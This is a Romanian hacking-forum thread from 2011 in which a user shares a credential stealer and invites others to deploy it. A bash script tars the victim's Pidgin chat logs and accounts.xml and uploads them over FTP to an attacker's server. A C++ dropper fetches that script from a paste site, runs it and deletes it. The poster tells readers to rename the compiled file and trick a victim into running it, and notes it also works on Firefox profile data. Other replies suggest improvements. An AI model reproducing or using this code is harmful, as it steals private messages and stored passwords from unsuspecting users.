pr00f Posted December 4, 2011 Report Share Posted December 4, 2011 (edited) Avem o surs? mic? (virgul?) care preia datele de la Pidgin (http://rstcenter.com/forum/43047-sh0rt-line-c0de-3.rst#post296355) ?i un script c++ care are rolul de a induce victima-n eroare. M? exprim ca naiba, da' în?elege?i voi.pidgin-getdata @ http://sprunge.us/FQPV#!/bin/bashcd $HOME/.purple/UDIRX='pwd'HOST='www.site.ro'FUSER='ftpuser'PASSWD='ftppasswd'tar -cf $USER.tar 'logs/' 'accounts.xml'ftp -n -v $HOST << EOTasciiuser $FUSER $PASSWDpromptmkdir $USERcd $USERmput $USER.tar $UDIRXbyeEOTrm -rf $USER.tarsteal.cpp#include <iostream>#include <stdlib.h>using namespace std;int main() {system("wget http://sprunge.us/FQPV");system("chmod +x FQPV");system("./FQPV");system("rm -rf FQPV");return 0;}Compila?i scriptul c++ cu link-ul vostru, rescrie?i numele la fi?ier, apoi pune?i victima s? ruleze. Mic, de c?cat, dar util.// Ce face:mput $USER.tar $UDIRX?Urc? arhiva .tar în directorul curent. Arhiva având ca nume user-ul logat. Pwd este pentru a printa directorul curent.// steal.cpp compilat, sa-l numim steal.o, trebuie sa aiba si el drepturi +x ca sa poata executa la randul lui :system("chmod +x FQPV");Nu este nevoie. Eu am folosit g++ -o stealer fisier.cpp ?i nu are nevoie de drept de execu?ie. Edited December 4, 2011 by pr00f 2 Quote Link to comment Share on other sites More sharing options...
l34k Posted December 4, 2011 Report Share Posted December 4, 2011 Ce face:mput $USER.tar $UDIRX? Quote Link to comment Share on other sites More sharing options...
Pugna Posted December 4, 2011 Report Share Posted December 4, 2011 steal.cpp compilat, sa-l numim steal.o, trebuie sa aiba si el drepturi +x ca sa poata executa la randul lui :system("chmod +x FQPV"); Quote Link to comment Share on other sites More sharing options...
adonisslanic Posted December 4, 2011 Report Share Posted December 4, 2011 uai, e faina faza xD Quote Link to comment Share on other sites More sharing options...
Nytro Posted December 4, 2011 Report Share Posted December 4, 2011 Cam prostie faza cu steal.cpp.Din C poti atat sa citesti fisiere cat si sa le uploadezi prin FTP sau altceva, si nu e deloc complicat.Si daca e facut totul din C te scapa de orice fel de dependinte.Dar ideea e buna, insa mai dificila e partea cu "infectatul". Quote Link to comment Share on other sites More sharing options...
pr00f Posted December 4, 2011 Author Report Share Posted December 4, 2011 (edited) Cam prostie faza cu steal.cpp.Din C poti atat sa citesti fisiere cat si sa le uploadezi prin FTP sau altceva, si nu e deloc complicat.Si daca e facut totul din C te scapa de orice fel de dependinte.Dar ideea e buna, insa mai dificila e partea cu "infectatul".?tiu. Am pornit de la ideea de baz?, ?i am r?mas tot pe scriptul de bash. Sincer, mi-a fost lene s? m? documentez despre arhivat & restul în c/cpp, ?i s?-l fac pe tot bazându-m? pe system() era cam aceea?i chestie.// Merge ?i la Mozilla, salvând toate chestiile în .mozilla/firefox/ Edited December 4, 2011 by pr00f Quote Link to comment Share on other sites More sharing options...